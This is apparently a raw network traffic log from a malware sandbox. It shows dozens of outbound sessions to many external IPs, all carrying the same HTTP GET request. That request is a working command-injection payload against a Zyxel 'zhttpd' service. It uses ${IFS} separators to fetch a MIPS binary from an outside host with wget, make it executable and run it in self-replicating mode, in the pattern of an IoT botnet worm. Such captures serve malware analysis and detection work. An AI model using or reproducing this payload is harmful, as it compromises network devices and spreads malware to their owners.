                                            Feb 2, 2024 06:21:24.875612020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7689192.168.2.154042214.249.154.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.875663996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7690192.168.2.1534134177.69.223.184443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.875689983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7691192.168.2.155523219.204.123.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.875735998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7692192.168.2.1552464176.157.38.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.875799894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7693192.168.2.155045618.243.175.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.875837088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7694192.168.2.155713888.244.58.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.875876904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7695192.168.2.1555806128.193.180.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.875897884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7696192.168.2.1558416207.98.49.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.875945091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7697192.168.2.1543838172.36.66.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.875971079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7698192.168.2.1546210196.238.149.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.876010895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7699192.168.2.1550586203.205.42.70443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.876069069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7700192.168.2.1560836137.159.243.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.876102924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7701192.168.2.154235853.58.56.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.876132011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7702192.168.2.1549478187.70.158.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.876152992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7703192.168.2.1542268123.23.234.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.876200914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7704192.168.2.1547860120.47.216.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.876245022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7705192.168.2.1556344160.25.244.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.876276016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7706192.168.2.1547480175.93.201.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.876307011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7707192.168.2.155301836.134.32.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.876357079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7708192.168.2.1556372139.104.239.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.876394987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7709192.168.2.1546622146.240.158.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.876451015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7710192.168.2.1546116218.226.175.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.876482964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7711192.168.2.1551954166.102.97.225443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.876527071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7712192.168.2.155860019.71.222.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.876557112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7713192.168.2.1558418141.58.194.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.876581907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7714192.168.2.1534908134.241.134.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.876635075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7715192.168.2.1548350200.235.35.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.876672029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7716192.168.2.1559906185.77.117.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.876717091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7717192.168.2.153398671.229.229.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.876764059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7718192.168.2.154304467.17.144.25443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.876806974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7719192.168.2.154249019.213.237.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.876837015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7720192.168.2.1545344175.133.151.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.876868010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7721192.168.2.155673449.32.172.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.876898050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7722192.168.2.154610624.153.208.43443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.876966000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7723192.168.2.1536220164.34.46.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.877000093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7724192.168.2.1560496126.216.211.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.877044916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7725192.168.2.1546206107.87.228.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.877079010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7726192.168.2.1552324151.210.27.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.877132893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7727192.168.2.153839824.91.95.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.877176046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7728192.168.2.154138651.157.39.25443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.877223015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7729192.168.2.1548442113.62.65.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.877266884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7730192.168.2.1559654200.229.160.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.877294064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7731192.168.2.1560764181.25.228.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.877341032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7732192.168.2.1533396152.225.99.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.877387047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7733192.168.2.153522493.34.54.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.889003992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7734192.168.2.153529825.100.211.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.889043093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7735192.168.2.1557826101.151.38.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.889081955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7736192.168.2.153856680.145.14.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.889139891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7737192.168.2.1549758106.75.16.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.889169931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7738192.168.2.155999060.140.73.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.889204025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7739192.168.2.1549350174.121.202.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.889234066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7740192.168.2.154740014.21.142.51443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.889290094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7741192.168.2.1535942164.108.142.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.889342070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7742192.168.2.1540796136.116.91.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.889384985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7743192.168.2.154657444.254.42.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.889439106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7744192.168.2.155693267.197.238.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.889477968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7745192.168.2.154335867.81.76.43443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.889507055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7746192.168.2.154162073.82.126.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.889549971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7747192.168.2.155397861.193.242.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.889597893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7748192.168.2.1536312194.28.77.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.889626026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7749192.168.2.1544498149.213.82.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.889686108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7750192.168.2.1546584146.95.239.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.889708996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7751192.168.2.155039018.37.122.131443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.889739037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7752192.168.2.1557886118.149.101.60443
                                            TimestampBytes transferredDirectionData
